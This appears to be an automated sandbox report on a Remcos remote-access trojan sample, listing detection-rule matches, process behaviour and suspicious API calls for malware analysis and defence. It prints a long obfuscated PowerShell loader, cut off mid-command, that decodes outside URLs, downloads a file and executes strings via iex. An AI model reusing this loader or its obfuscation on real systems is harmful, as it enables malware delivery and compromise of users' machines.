Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe, type: SAMPLE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: amsi32_2064.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_5644.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 4.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 5.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 6.0.17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000000.2093024228.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000005.00000000.2171694344.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000004.00000000.2170895717.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000006.00000000.2172358054.0000000000459000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 4368, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3744, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3792, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe PID: 3504, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: powershell.exe PID: 2064, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5644, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Potential malicious VBS script found (suspicious strings)
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Dropped file: Call Terminologers183.ShellExecute("P" & Essens, forsaales, "", "", Swizzled221) Jump to dropped file
Very long command line found
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 3859
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3859
Source: C:\Windows\SysWOW64\wscript.exe Process created: Commandline size = 3859 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 3859 Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0 Revisoratets207 Smaatrykkene forlise Sujet Udvandringerne Wadies Thioantimonious Unparalysed Whiffer masseproduceres Entings Hebenon Zymin Dumpningsskibes Reobtainment Allingeboens Zinkkografierne Checksums Reverbrate Phare Spisekkkens Programredaktrs heteromorphous Sparkedragten0';If (${host}.CurrentCulture) {$Digers++;}Function Svndyssendes94($Dukketeatrenes){$Uadskilleligt=$Dukketeatrenes.Length-$Digers;$Mainlining='SUBsTR';$Mainlining+='ing';For( $truthsman=1;$truthsman -lt $Uadskilleligt;$truthsman+=2){$Revisoratets207+=$Dukketeatrenes.$Mainlining.Invoke( $truthsman, $Digers);}$Revisoratets207;}function Scance($Strukturndringernes){ . ($Gederamsen) ($Strukturndringernes);}$Ambages77=Svndyssendes94 ' MIo zGi lKl,aL/C5F. 0R (.W iSn d o,wOs BNQT. R1 0,.v0P; ,W iBnO6 4D;S Uxy6 4M;, ,rSvM:T1 2.1..P0C) SGBeHc k o,/B2 0O1 0 0 1,0B1F IF i.rBeNf,oHxC/E1 2A1 .U0B ';$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';$Fluffs=Svndyssendes94 'S> ';$Gederamsen=Svndyssendes94 'Pi,e x ';$Lgnere='Unparalysed';$decos = Svndyssendes94 'Ee cMh,oS % a p pTdaaStSa % \FS n i g m yMr,dJe dPeA. SFkSo. ,& &H FeDc h.oU t ';Scance (Svndyssendes94 ',$ g lHo bOaAlC:PRge.gFr =h( c m,d, /Vc, .$ d.e.cBoBs,). ');Scance (Svndyssendes94 'E$SgElFo b.a lR:CS uLj.eFt,=S$SUTdKvFa,n,dIrDiOn.gSeLr,nSe .HsApGlAi tB( $ FJl.uOfNf.sD)p ');Scance (Svndyssendes94 ',[BN e,t .cS eorHvLi.cVe PSo iNn.tSMcaCn,aogAeKr,]S:D:OSPePc uPr.iKt y PDrCoBt o,cFool I=. C[SNNeLt ..S eBcHu rUi.t yMPMrMo.tKo,c o l.TVyGp e ]N:F:VTRl sR1F2E ');$Udvandringerne=$Sujet[0];$Respriser= (Svndyssendes94 ',$.gIl.o bRaBlP: Y m c a = N eIw -.OLb jbeMc t, S.yEsCt,e mH.RNUeStH.mW e.bRCKl i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError, 0_2_004180EF
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 0_2_004132D2
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle, 0_2_0041BB09
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle, 0_2_0041BB35
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle, 4_2_0040DD85
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00401806 NtdllDefWindowProc_W, 4_2_00401806
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_004018C0 NtdllDefWindowProc_W, 4_2_004018C0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_004016FD NtdllDefWindowProc_A, 5_2_004016FD
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_004017B7 NtdllDefWindowProc_A, 5_2_004017B7
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00402CAC NtdllDefWindowProc_A, 6_2_00402CAC
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 6_2_00402D66 NtdllDefWindowProc_A, 6_2_00402D66
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 0_2_004167B4
Detected potential crypto function
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0043E0CC 0_2_0043E0CC
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041F0FA 0_2_0041F0FA
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00454159 0_2_00454159
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00438168 0_2_00438168
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004461F0 0_2_004461F0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0043E2FB 0_2_0043E2FB
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0045332B 0_2_0045332B
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0042739D 0_2_0042739D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004374E6 0_2_004374E6
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0043E558 0_2_0043E558
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00438770 0_2_00438770
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_004378FE 0_2_004378FE
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00433946 0_2_00433946
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0044D9C9 0_2_0044D9C9
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00427A46 0_2_00427A46
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0041DB62 0_2_0041DB62
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00427BAF 0_2_00427BAF
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00437D33 0_2_00437D33
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00435E5E 0_2_00435E5E
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00426E0E 0_2_00426E0E
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_0043DE9D 0_2_0043DE9D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00413FCA 0_2_00413FCA
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_00436FEA 0_2_00436FEA
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_10017194 0_2_10017194
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 0_2_1000B5C1 0_2_1000B5C1
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044B040 4_2_0044B040
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0043610D 4_2_0043610D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00447310 4_2_00447310
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044A490 4_2_0044A490
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0040755A 4_2_0040755A
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0043C560 4_2_0043C560
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044B610 4_2_0044B610
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044D6C0 4_2_0044D6C0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_004476F0 4_2_004476F0
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044B870 4_2_0044B870
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044081D 4_2_0044081D
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00414957 4_2_00414957
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_004079EE 4_2_004079EE
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00407AEB 4_2_00407AEB
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044AA80 4_2_0044AA80
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00412AA9 4_2_00412AA9
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00404B74 4_2_00404B74
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00404B03 4_2_00404B03
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_0044BBD8 4_2_0044BBD8
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00404BE5 4_2_00404BE5
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00404C76 4_2_00404C76
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00415CFE 4_2_00415CFE
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00416D72 4_2_00416D72
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00446D30 4_2_00446D30
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00446D8B 4_2_00446D8B
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 4_2_00406E8F 4_2_00406E8F
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00405038 5_2_00405038
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0041208C 5_2_0041208C
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_004050A9 5_2_004050A9
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0040511A 5_2_0040511A
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0043C13A 5_2_0043C13A
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_004051AB 5_2_004051AB
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_00449300 5_2_00449300
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0040D322 5_2_0040D322
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Code function: 5_2_0044A4F0 5_2_0044A4F0
